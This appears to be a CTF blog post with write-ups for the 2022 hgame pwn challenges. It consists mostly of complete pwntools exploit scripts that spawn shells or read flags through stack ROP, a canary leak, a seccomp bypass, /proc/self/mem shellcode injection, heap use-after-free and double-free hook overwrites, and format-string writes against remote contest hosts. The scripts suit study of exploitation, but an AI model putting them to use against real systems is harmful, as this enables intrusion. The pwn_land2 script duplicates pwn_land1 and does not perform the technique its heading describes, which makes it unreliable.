triplewings

2022hgamectf

2022-02-28 · 23 min read
pwn_game

2022的重置更新,就从这里开始吧~

week1

gdb

  • 触发 gets 漏洞,拿到 shell
from pwn import *
# log_level='debug' dumps every byte sent and received; handy when a recv below hangs.
context(os='linux', arch='amd64', log_level='debug')
# p = remote("chuj.top", 50684)
# Local run against the challenge binary; the contest target is the commented-out remote line.
p = process("./a.out")
# Presumably the tail of a "password"-style prompt — the full prompt text is not shown on this page.
p.recvuntil(b"word")

# First input: two hard-coded little-endian qwords (their meaning is not shown on this page).
payload = p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9)

p.send(payload)

# Skip to the first 0x7f byte, drop two more bytes, then take the next 8 bytes as the stack canary.
# NOTE(review): anchoring on 0x7f is fragile — any change in the program's output makes the 8 bytes
# read here something other than the canary, and the final send would then crash the target.
p.recvuntil(b"\x7f")
p.recv(2)
canary = u64(p.recv(8))
print(hex(canary))
# Second input: 24 bytes of filler, the canary written back in place, 8 bytes over the saved rbp,
# then the hard-coded address 0x401256 as the return address (its target is not shown here).
p.send(b"a"*24 + p64(canary) + b"a"*8 + p64(0x401256))
p.interactive()

pwn_land1

  • baby rop,改puts
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# Local run; the remote target is kept as a comment. The gadget/GOT/PLT addresses below are
# fixed for this binary (0x40xxxx range); libc offsets are taken from the bundled libc-2.31.so,
# so the script only works against that exact libc build.
p = process("./a.out")
# p = remote("chuj.top", 31470)
libc = ELF("libc-2.31.so")

pop_rdi = 0x0000000000401313
pop_rsi_r15 = 0x0000000000401311
puts_got = 0x404020
puts_plt = 0x401090

# Stage 1: 44 bytes of filler, a single 0x2c byte plus three NULs (presumably a 4-byte local that
# must keep a specific value — not shown on this page), 8 bytes over the saved rbp, then
# puts(puts_got) and a return to 0x4011B6 so a second input round is possible.
payload = b"a"*44 + b"\x2c" + b"\x00"*3 + b"a"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011B6) + b"\n"
# gdb.attach(p, "b *0x4011B6")
p.send(payload)
p.recvuntil(b"\n")
# Leak: the 6 bytes ending at the first 0x7f byte are puts's runtime address; subtracting the
# symbol offset gives the libc base. (A str delimiter "\x7f" is accepted by pwntools, but a bytes
# literal would be consistent with the rest of the file.)
libc.address = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))  - libc.sym["puts"]
print(hex(libc.address))

# NOTE(review): `system` actually holds execv's address (see the symbol name); the local name is
# misleading. `next(libc.search(...))` is the idiomatic spelling of `.__next__()`.
sh = libc.search(b'/bin/sh').__next__()
system = libc.sym['execv']

# Stage 2: same prefix, then rsi = 0 (and r15 = 0), rdi = &"/bin/sh", and a call to execv.
payload2 = b"b"*44 + b"\x2c" + b"\x00"*3 + b"c"*8 + p64(pop_rsi_r15) + p64(0)*2 +p64(pop_rdi) + p64(sh) +p64(system) + b"\n"

p.send(payload2)

p.interactive()

pwn_land2

  • 利用多线程canary和tls离stack近的特点覆盖canary
from pwn import *

# NOTE(review): this listing is byte-for-byte identical to the pwn_land1 script above (same port
# in the commented-out remote line, same gadgets, same payloads). It does not implement the
# thread-canary / TLS overwrite that the heading describes — presumably the wrong file was pasted.
context(os='linux', arch='amd64', log_level='debug')

p = process("./a.out")
# p = remote("chuj.top", 31470)
libc = ELF("libc-2.31.so")

# Fixed addresses in the challenge binary; libc offsets come from libc-2.31.so.
pop_rdi = 0x0000000000401313
pop_rsi_r15 = 0x0000000000401311
puts_got = 0x404020
puts_plt = 0x401090

# Stage 1: leak puts via puts(puts_got), then return to 0x4011B6 for a second round.
payload = b"a"*44 + b"\x2c" + b"\x00"*3 + b"a"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4011B6) + b"\n"
# gdb.attach(p, "b *0x4011B6")
p.send(payload)
p.recvuntil(b"\n")
# Last 6 bytes before the first 0x7f byte = puts's address; libc base follows from the symbol offset.
libc.address = u64(p.recvuntil("\x7f")[-6:].ljust(8, b"\x00"))  - libc.sym["puts"]
print(hex(libc.address))

# `system` holds execv's address despite its name.
sh = libc.search(b'/bin/sh').__next__()
system = libc.sym['execv']

# Stage 2: execv("/bin/sh", NULL) — rsi/r15 = 0, rdi = &"/bin/sh".
payload2 = b"b"*44 + b"\x2c" + b"\x00"*3 + b"c"*8 + p64(pop_rsi_r15) + p64(0)*2 +p64(pop_rdi) + p64(sh) +p64(system) + b"\n"

p.send(payload2)

p.interactive()

orw

  • ban了openat,用getdents64读取目录,然后正常orw
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
# NOTE(review): the local process is started and then immediately shadowed by the remote
# connection, so it keeps running unused (with its pipes open) until the script exits.
# Comment one of the two lines out, as the other scripts on this page do.
p = process("vuln")
p = remote("chuj.top", 41765)
# Symbol offsets (write, read, alarm, getdents64) come from this exact libc build.
libc = ELF("libc-2.31.so")

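def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None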


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

p.recvuntil("size?")

# A size of -1 is what the program accepts here (why it passes the size check is not shown on this page).
p.sendline("-1")

p.recvuntil("content?")

# gdb.attach(p, "b *0x401311")

# Fixed addresses in the challenge binary (0x40xxxx range).
pop_rdi = 0x0000000000401443
pop_rsi_r15 = 0x0000000000401441
write_got = 0x404018
write_plt = 0x401080

main = 0x401311
leave = 0x4013DB
read_plt = 0x4010A0
# Scratch area in .bss, used as a fake stack by the `leave` pivot below.
bss = 0x404060 + 0x100

# Round 1: after 40 bytes, the qword -1 and then `bss` land on the frame's saved slots; the chain
# calls read(0, bss, ...) and returns to main so another round can be played.
payload = b"a"*40 + p64(0xffffffffffffffff) + p64(bss)
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss) + p64(0) + p64(read_plt) + p64(main)
p.send(payload)
p.recvuntil("done!")
# Data that read() stores at bss: main's address as 4 bytes plus two NULs.
payload2 = p32(main) + b"\x00"*2
p.send(payload2)
p.recvuntil("size?\n")

p.sendline(b"-1")

p.recvuntil("content?")

# Round 2: saved rbp := bss-8, then write(<rdi unchanged>, write_got, 0) leaks write's address;
# `leave` moves the stack to bss, where main's address was stored in round 1.
payload = b"a"*40 + p64(0xffffffffffffffff) + p64(bss-0x8)
payload += p64(pop_rsi_r15) + p64(write_got) + p64(0) + p64(write_plt) + p64(leave) + p64(main)


p.send(payload)

# Last 6 bytes ending at the first 0x7f byte = write's runtime address.
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))  - libc.sym["write"]


print(hex(libc.address))

p.recvuntil("size?")

p.sendline("-1")

p.recvuntil("content?")

# Gadget offsets inside libc-2.31.so (build-specific). libc_pop_rax is defined but never used.
libc_pop_rax = 0x000000000004a550
libc_pop_rax_rdx_rbx = 0x0000000000162865
libc_pop_rdx_r12 = 0x000000000011c371
libc_pop_rcx = 0x000000000009f822

# Round 3: the content itself starts with the path "./"; rax=2 is the open syscall number and
# `alarm + 9` presumably is the `syscall` instruction inside alarm (TODO confirm). Defender's
# note: the heading says openat was banned, yet plain open (rax=2) still goes through — a filter
# that blocks one of the two entry points is incomplete. 0x404130 presumably is where the program
# stores the content, i.e. the "./" at the front of this very payload.
payload = b"./" + b"\x00"*14 + b"a"*0x18 + p64(0xffffffffffffffff) + b"a"*8
payload += p64(libc.address + libc_pop_rax_rdx_rbx) + p64(2) + p64(0) + p64(0) + p64(pop_rdi) + p64(0x404130) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(libc.sym["alarm"] + 9)

# getdents64(3, 0x404280, 0x200) — rcx is set as well, presumably for the function's fourth argument.
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(0x404280) + p64(0)
payload += p64(libc_pop_rdx_r12 + libc.address) + p64(0x200) + p64(0) 
payload += p64(libc_pop_rcx + libc.address) +p64(0x404280 + 0x200)
payload += p64(libc.sym["getdents64"])

# write(1, 0x404280, 0x200) prints the directory listing, then back to main.
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(0x404280) + p64(0) + p64(libc_pop_rdx_r12 + libc.address) + p64(0x200) + p64(0) + p64(libc.sym["write"]) + p64(main)


p.send(payload)
p.recvuntil(b"done")
# The listing contains a file name beginning with "flag"; the 20 bytes after it are the name's tail.
p.recvuntil(b"flag")
tail = p.recv(20)


# tail = b"a74248296b5d7f3d2b01"

p.recvuntil("size?")

p.sendline("-1")

p.recvuntil("content?")

# Round 4: open("./flag<tail>") (same rax=2 / alarm+9 route; 0x404228 presumably is the content
# address in this round), then read(4, bss-0xc0, 0x100) and write(1, ...) with the same buffer.
payload = b"./flag" + tail + b"\x00"*6 + b"a"*8 + p64(0xffffffffffffffff) + b"a"*8
payload += p64(libc.address + libc_pop_rax_rdx_rbx) + p64(2) + p64(0) + p64(0) + p64(pop_rdi) + p64(0x404228) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(libc.sym["alarm"] + 9)
payload += p64(pop_rdi) + p64(4) + p64(pop_rsi_r15) + p64(bss- 0xc0) + p64(0) + p64(libc.address+libc_pop_rdx_r12) + p64(0x100) + p64(0)
payload += p64(libc.sym["read"])
payload += p64(pop_rdi) + p64(1) + p64(libc.sym["write"])

# sendline (not send) here — the trailing newline is part of what the program receives.
p.sendline(payload)

p.interactive()

week2

blind

访问 /proc/self/mem 即可修改当前进程的内存, .text 段也是可修改的

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# Remote only — no local process is started for this one. Symbol offsets (write,
# __libc_start_main) come from the libc shipped with the challenge.
p = remote("chuj.top", 51808)
libc = ELF("./libc.so.6")

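def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None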


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

p.recvuntil("write: ")

# The service prints write's address in hex; libc base = that minus write's offset in the bundled libc.
libc.address = int(p.recvuntil('\n')[:-1], base = 16) - libc.sym["write"]
print(hex(libc.address))
# The service asks for a path, an offset and data (three ">> " prompts). Path: the process's own
# memory file; offset: __libc_start_main's runtime address — the note above this script explains
# that writing through /proc/self/mem bypasses the page's own protections, including .text.
p.sendlineafter(">> ", b'/proc/self/mem\x00')
p.sendlineafter(">> ", str(libc.sym["__libc_start_main"]))
# shellcraft.sh() assembles a /bin/sh shellcode; it is right-aligned inside a 0x300-byte nop sled
# so the exact entry point within the overwritten range does not matter.
payload = asm(shellcraft.sh())
payload = payload.rjust(0x300, asm('nop')) + b'\n'
p.sendafter(">> ", payload)

p.interactive()

oldfashion_note

uaf 2.31 打 fastbins

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# NOTE(review): the local process is started and then immediately shadowed by the remote
# connection, so it lingers unused until the script exits; comment one of the two out.
p = process("./note")
p = remote("chuj.top", 51445)
# libc 2.31: the 7-entry tcache count used below and the main_arena distance are specific to it.
libc = ELF("./libc-2.31.so")

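def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None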


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)


def menu(i):
    """Choose menu option *i*: wait for the prompt containing "farewell", then send the choice as a line."""
    choice = str(i)
    p.sendlineafter(b"farewell", choice)

def add(idx, size, content):
    """Menu option 1 (new note): answer the index and size prompts, then send *content* raw (no newline)."""
    menu(1)
    for prompt, answer in ((b"index?", idx), (b"size?", size)):
        p.sendlineafter(prompt, str(answer))
    p.sendafter(b"content?", content)

def show(idx):
    """Menu option 2 (print a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(2)
    p.sendlineafter(b"index?", target)

def free(idx):
    """Menu option 3 (delete a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(3)
    p.sendlineafter(b"index?", target)


# Eight 0x80-byte notes; freeing seven of them (indexes 7..1) fills the 7-entry tcache bin for
# that size in libc 2.31, so the eighth free (index 0) goes to the unsorted bin instead.
for i in range(8):
    add(i, 0x80, b"aaa")

for i in range(7):
    free(7-i)

free(0)
# show() on a freed note (the UAF from the heading) prints its free-list pointer, which points
# into main_arena; 96 + 0x10 is the author's distance from that list head back to __malloc_hook.
show(0)

libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 96 - 0x10 - libc.sym["__malloc_hook"]
print(hex(libc.address))

# Take the 0x80 chunks back, then make nine 0x20 notes. Freeing 8..1 puts seven in the tcache and
# index 1 in the fastbin; free(0) and then free(1) again make index 1 a fastbin double free.
for i in range(8):
    add(i, 0x80, b"bbb")

for i in range(9):
    add(i, 0x20, b"ccc")

for i in range(8):
    free(8-i)

free(0)
free(1)

# Drain the seven tcache entries so the next 0x20 requests are served from the fastbin.
for i in range(2, 9):
    add(i, 0x20, b"ddd")

# The doubly-freed chunk's first qword (its free-list link) is overwritten with __free_hook's
# address; the allocations that follow eventually return the hook itself (index 2), where
# system's address is stored. Freeing the "/bin/sh" note then goes through the hook.
add(1, 0x20, p64(libc.sym["__free_hook"]))
add(0, 0x20, b"/bin/sh\x00")
add(1, 0x20, b"eee")
add(2, 0x20, p64(libc.sym["system"]))
free(0)



p.interactive()

echo server

堆上的格式化字符串, 打reallocog填到malloc_hook

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# NOTE(review): the local process is started and then immediately shadowed by the remote
# connection, so it lingers unused until the script exits; comment one of the two out.
p = process("./echo")
p = remote("chuj.top", 52259)
# The 895550 constant and the one_gadget offset used below are specific to this libc build.
libc = ELF("./libc-2.31.so")

def echo(length, content):
    """One round of the echo service: answer the length prompt with *length*, then send *content* raw (no newline)."""
    declared = str(length)
    p.sendlineafter(b"your content's length:", declared)
    p.send(content)

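def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None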


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)


# Three format-string leaks (the heading: the format string lives on the heap). Each positional
# %p is read back between the "\n>> " echo prefix and the "zz" marker appended to the format.
echo(0x450, b"%3$pzz")
p.recvuntil("\n>> ")
# 895550 - 0x10 - __malloc_hook: the author's constant turning the slot-3 pointer into the libc
# base; it is valid only for this libc-2.31.so build.
libc.address = int(p.recvuntil("zz")[:-2].decode(), 16) + 895550 - 0x10 - libc.sym["__malloc_hook"]
echo(0x450, b"%6$pzz")
p.recvuntil("\n>> ")
# Slot 6 is a heap pointer; -0x10 makes heap_0 point at a chunk header.
heap_0 = int(p.recvuntil("zz")[:-2].decode(), 16) - 0x10

echo(0x450, b"%4$pzz")
p.recvuntil("\n>> ")
heap_fastbins = int(p.recvuntil("zz")[:-2].decode(), 16)

print(hex(libc.address))
print(hex(heap_0))
print(hex(heap_0 & 0xff))
print(hex(heap_fastbins))
# Requests of decreasing size — presumably shaping the heap so that later 0x60 requests land at
# known places; the resulting layout is not shown on this page.
echo(0x450, b"aaa")
echo(0x3e0, b"aaa")
echo(0x370, b"aaa")
echo(0x300, b"aaa")
echo(0x290, b"aaa")
echo(0x220, b"aaa")
echo(0x1b0, b"aaa")
echo(0x140, b"aaa")
echo(0xd0, b"aaa")

echo(0x60, b"aaa")


# Partial writes: "%<N>c" pads the output to N characters and %hhn / %hn then store the low byte /
# low word of that count through the pointers found at stack slots 6 and 10.
echo(0x60, b"%" + str(heap_0 & 0xff).encode()  + b"c%6$hhn")
echo(0x60, b"%" + str((heap_fastbins + 0xe0) & 0xffff).encode()  + b"c%10$hn")

echo(0x60, p64(libc.sym["__free_hook"]))
echo(0, b"")

# Each "%10$ln" stores the running character count (0 here) as a long through slot 10; the
# alternating "aaa" rounds advance whatever slot 10 points at between writes (inferred, not shown).
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")

echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")
echo(0x60, b"aaa")
echo(0x60, b"%10$ln")


# Fake chunk headers (size fields 0x51, 0x41, 0x71) are written along with the format strings;
# the 0x30 request ends with __realloc_hook - 27 as a free-list link, i.e. the target of a later
# allocation ("打realloc" in the heading).
echo(0x60, b"%10$ln\x00\x00" + p64(0)*2 + p64(0x51))
echo(0x60, b"%96c%10$hhn" + b"\x00"*5 + p64(0)*7 + p64(0x41))
echo(0x30, p64(0)*3 + p64(0x71) + p64(libc.sym["__realloc_hook"] - 27))
echo(0x30, b"%10$ln")

echo(0x60, b"aaa")

echo(0x60, b"%10$ln")
# gdb.attach(p, "b *$rebase(0x129F)")
# The final write stores libc + 0xe6c81 — the execve one_gadget listed in the comments under this
# script (its constraints: r15 and rdx NULL or pointing at NULL).
echo(0x60, b"%10$ln" + b"\x00"*5 + p64(0)*2 + p64(0) + p64(libc.address + 0xe6c81))
# echo(0x0, b"")
# A zero-length round takes the allocation path that reaches the overwritten hook (presumably
# via realloc, per the heading — not shown on this page).
echo(0x0, b"aaa")
# %224c%4$hhn

p.interactive()

# 0xe6c7e execve("/bin/sh", r15, r12)
# constraints:
#   [r15] == NULL || r15 == NULL
#   [r12] == NULL || r12 == NULL

# 0xe6c81 execve("/bin/sh", r15, rdx)
# constraints:
#   [r15] == NULL || r15 == NULL
#   [rdx] == NULL || rdx == NULL

# 0xe6c84 execve("/bin/sh", rsi, rdx)
# constraints:
#   [rsi] == NULL || rsi == NULL
#   [rdx] == NULL || rdx == NULL

week3

changeable note

2.23 打stdout

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# NOTE(review): the local process is started and then immediately shadowed by the remote
# connection, so it lingers unused until the script exits; comment one of the two out.
p = process("./note")
p = remote("chuj.top", 52401)
# libc 2.23 (no tcache): the -0x23 fastbin offset and the 0xf03a4 gadget below are specific to it.
libc = ELF("./libc-2.23.so")


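def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None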


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

def menu(i):
    """Choose menu option *i*: wait for the "4. farewell" line of the menu, then send the choice as a line."""
    choice = str(i)
    p.sendlineafter(b"4. farewell", choice)

def add(idx, size, content):
    """Menu option 1 (new note): answer the index and size prompts, then send *content* raw (no newline)."""
    menu(1)
    for prompt, answer in ((b"index?", idx), (b"size?", size)):
        p.sendlineafter(prompt, str(answer))
    p.sendafter(b"content?", content)

def edit(idx, content):
    """Menu option 2 (edit a note): answer the index prompt, then send *content* followed by a newline.

    No length is asked for, so *content* is sent in full whatever the note's size.
    """
    target = str(idx)
    menu(2)
    p.sendlineafter(b"index?\n>> ", target)
    p.sendline(content)

def free(idx):
    """Menu option 3 (delete a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(3)
    p.sendlineafter(b"index?", target)


# libc 2.23, no tcache. Notes 0..4; note 2's content carries a fake 0x41 size field.
add(0,0x30,b"aaa")
add(1,0x60,b"aaa")
add(2,0x60,p64(0)*5 + p64(0x41))
add(3,0x10,b"aaa")
add(4,0x10,b"aaa")

# edit() sends a whole line with no length check, so these 80-byte writes into 0x60/0x30 notes
# run into the next chunk's header: note 2's size becomes 0x21, note 1's becomes 0xe1.
edit(1, p64(0)*9 + p64(0x21))
edit(0, p64(0)*7 + p64(0xe1))
free(1)
free(2)

# Carve the freed (resized) region into new notes; note 7's 2-byte content "\xdd\x25" is a partial
# overwrite of a fastbin link, presumably aiming near _IO_2_1_stdout_ (the base is computed from
# _IO_2_1_stdin_ below). Part of that value depends on ASLR, so a run can fail and need repeating.
add(5,0x40,b"aaa")
add(6,0x10,b"aaa")
add(7,0x20,b"\xdd\x25")
add(8,0x30,b"aaa")
edit(6, p64(0)*3 + b"\x71")
add(9, 0x60, b"\xdd\x25")
# 0x33 bytes of padding, then 0xfbad1887 as the stream's flags word and 0x88 as the low byte of a
# buffer pointer: the next stdout flush then prints libc memory, which is what the leak reads.
add(10, 0x60, b"\x00"*0x33 + p64(0xfbad1887) +p64(0)*3 + p8(0x88))
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - libc.sym['_IO_2_1_stdin_']
print(hex(libc.address))
# Same resize / free / re-carve sequence, this time pointing the fastbin link at
# __malloc_hook - 0x23 (the author's offset; its suitability is not verifiable from this page).
edit(0, p64(0)*7 + p64(0xe1))
free(9)
free(5)
add(5,0x40,b"aaa")
add(6,0x10,b"aaa")
add(7,0x20,p64(libc.sym["__malloc_hook"] - 0x23))
add(8,0x30,b"aaa")
edit(6, p64(0)*3 + b"\x71")
add(9, 0x60, b"aaa")

# 3 + 16 bytes of padding reach __malloc_hook, which is set to the 0xf03a4 one_gadget listed in
# the comments below this script.
add(10, 0x60, b"\x00"*3 + p64(0)*2 + p64(libc.address + 0xf03a4))

# gdb.attach(p, "b edit_note")
# Shrink note 9's size field to 0x41 and free it: free() rejects the chunk, and on libc 2.23 the
# error report itself allocates, which goes through the overwritten __malloc_hook (presumably —
# the same idea as the elder_note heading "double_free报错拿shell").
edit(6, p64(0)*3 + b"\x41")
free(9)


p.interactive()

# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

elder_note

double free 打 malloc_hook, double_free 报错拿 shell

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

# NOTE(review): the local process is started and then immediately shadowed by the remote
# connection, so it lingers unused until the script exits; comment one of the two out.
p = process("./note")
p = remote("chuj.top", 52620)
# libc 2.23 (no tcache): the 88-byte arena distance, the -0x23 offset and the 0xf03a4 gadget are specific to it.
libc = ELF("./libc-2.23.so")


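def proof(y):
    """Solve the server's proof-of-work: find the 4-character alphanumeric string whose
    SHA-256 hex digest equals *y*, send it to ``p`` as a line, and return it.

    Candidates are enumerated over ascii letters followed by digits, leftmost position
    slowest — the same order as the original four nested loops, so the first match (and
    hence what gets sent) is unchanged. Imports are explicit instead of relying on
    ``from pwn import *`` re-exporting ``string`` and ``hashlib``.

    Args:
        y: lowercase hex SHA-256 digest (str) copied from the challenge banner.

    Returns:
        The matching string, or None when no 4-character candidate hashes to *y*.
        In that case 'Wrong!' is printed, as before, and nothing is sent; callers on
        this page do not check the result, so their next recv would then stall.
    """
    import hashlib
    import itertools
    import string

    alphabet = string.ascii_letters + string.digits
    # Worst case 62**4 (~15M) hashes — acceptable for a one-off handshake.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = "".join(combo)
        if hashlib.sha256(candidate.encode()).hexdigest() == y:
            p.sendline(candidate)
            return candidate
    print('Wrong!')
    return None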


# Proof-of-work handshake: the banner ends with " == <sha256 hex>"; proof() finds and sends the 4-char preimage.
p.recvuntil(b" == ")
a = p.recvuntil(b"\n")[:-1].decode()
print(a)
proof(a)

def menu(i):
    """Choose menu option *i*: wait for the "4. farewell" line of the menu, then send the choice as a line."""
    choice = str(i)
    p.sendlineafter(b"4. farewell", choice)

def add(idx, size, content):
    """Menu option 1 (new note): answer the index and size prompts, then send *content* raw (no newline)."""
    menu(1)
    for prompt, answer in ((b"index?", idx), (b"size?", size)):
        p.sendlineafter(prompt, str(answer))
    p.sendafter(b"content?", content)

def show(idx):
    """Menu option 2 (print a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(2)
    p.sendlineafter(b"index?", target)

def free(idx):
    """Menu option 3 (delete a note): answer the index prompt with *idx*."""
    target = str(idx)
    menu(3)
    p.sendlineafter(b"index?", target)

add(0, 0x80, b"aaa")
add(1, 0x80, b"aaa")
# Free a 0x80 note (unsorted bin — libc 2.23 has no tcache) and show it: its free-list pointer
# points into main_arena; 88 + 0x10 is the author's distance from that list head back to
# __malloc_hook in this libc.
free(0)
show(0)
# recvuntil("") with an empty delimiter is a no-op and can be dropped.
p.recvuntil("")
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 88 - 0x10 - libc.sym["__malloc_hook"]


# Fastbin double free in the order 0, 1, 0 — the allocator only rejects freeing the same chunk
# twice in a row.
add(0, 0x80, b"aaa")
add(0, 0x60, b"aaa")
add(1, 0x60, b"aaa")
add(2, 0x60, b"/bin/sh")
free(0)
free(1)
free(0)
# The first re-allocation writes __malloc_hook - 0x23 into the doubly-freed chunk's free-list
# link (the author's offset; not verifiable from this page).
add(0, 0x60, p64(libc.sym["__malloc_hook"] - 0x23))

add(1, 0x60, b"aaa")
add(3, 0x60, b"aaa")
# gdb.attach(p, "b add_note")

print(hex(libc.address))
# Fourth 0x60 allocation returns the fake chunk in front of the hook: 3 + 16 bytes of padding
# reach __malloc_hook, which is set to the 0xf03a4 one_gadget listed in the comments below.
